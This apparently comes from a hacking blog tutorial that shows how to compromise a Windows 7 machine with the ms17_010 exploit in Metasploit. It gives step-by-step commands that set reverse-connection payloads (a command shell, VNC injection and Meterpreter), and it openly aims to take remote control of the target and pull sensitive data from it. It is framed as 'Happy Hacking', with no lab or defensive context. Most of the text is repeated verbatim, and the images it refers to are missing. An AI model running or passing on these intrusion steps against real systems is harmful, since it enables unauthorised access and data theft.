In this tutorial we are going to deeply explain about how to hack a windows 7 OS with ms17_010 exploit.
Configure the exploit as shown below.
Verify the exploit options and set RHOST value to the target’s IP address
In this practical, let us perform an attack using three different payloads.
Payload 1:
At first, we will start with a payload that helps us gain shell access to the target computer. Execute show payloads command and choose shell payload from the list of payloads.
To set payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>
Verify the configured options, then execute exploit command to gain shell access.
Here we are targeting Windows 7 machine, so after exploitation, we got windows shell prompt where we can execute different MS-DOS commands to grab some sensitive information from the target machine.
Payload 2:
Now let us use a different payload that provides a graphical view of the target computer as a separate window on attacker’s machine. Here, we need to change payload to perform desired operation (remove shell payload and add another payload). Execute the unset payload command to remove the previous payload. To gain graphical access select windows/x64/vncinject/reverse_tcp payload from the list of payload options.
To set Payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>
Check the configured options and execute the exploit command, which automatically opens a separate window with target’s computer (Windows 7) interface as shown in below image.
Payload 3:
Now let us use a meterpreter payload to gain more control over the target system. We need to change payload to windows/meterpreter/reverse_tcp
To set Payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>
if everything is properly configured then and run exploit command to gain meterpreter access to the target machine.
By following the above commands you can hack windows 7 operating system with ms17_010 exploit using 3 payloads. In next tutorial we are going to explain some meterpreter commands that is helpful to retrieve data from target's computer.
Happy Hacking:)
Configure the exploit as shown below.
Verify the exploit options and set RHOST value to the target’s IP address
Payload 1:
At first, we will start with a payload that helps us gain shell access to the target computer. Execute show payloads command and choose shell payload from the list of payloads.
set LHOST <IP address>
set LPORT <Port No>
Verify the configured options, then execute exploit command to gain shell access.
Here we are targeting Windows 7 machine, so after exploitation, we got windows shell prompt where we can execute different MS-DOS commands to grab some sensitive information from the target machine.
Payload 2:
Now let us use a different payload that provides a graphical view of the target computer as a separate window on attacker’s machine. Here, we need to change payload to perform desired operation (remove shell payload and add another payload). Execute the unset payload command to remove the previous payload. To gain graphical access select windows/x64/vncinject/reverse_tcp payload from the list of payload options.
To set Payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>
Check the configured options and execute the exploit command, which automatically opens a separate window with target’s computer (Windows 7) interface as shown in below image.
Payload 3:
Now let us use a meterpreter payload to gain more control over the target system. We need to change payload to windows/meterpreter/reverse_tcp
To set Payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>
if everything is properly configured then and run exploit command to gain meterpreter access to the target machine.
By following the above commands you can hack windows 7 operating system with ms17_010 exploit using 3 payloads. In next tutorial we are going to explain some meterpreter commands that is helpful to retrieve data from target's computer.
Happy Hacking:)
No comments:
Post a Comment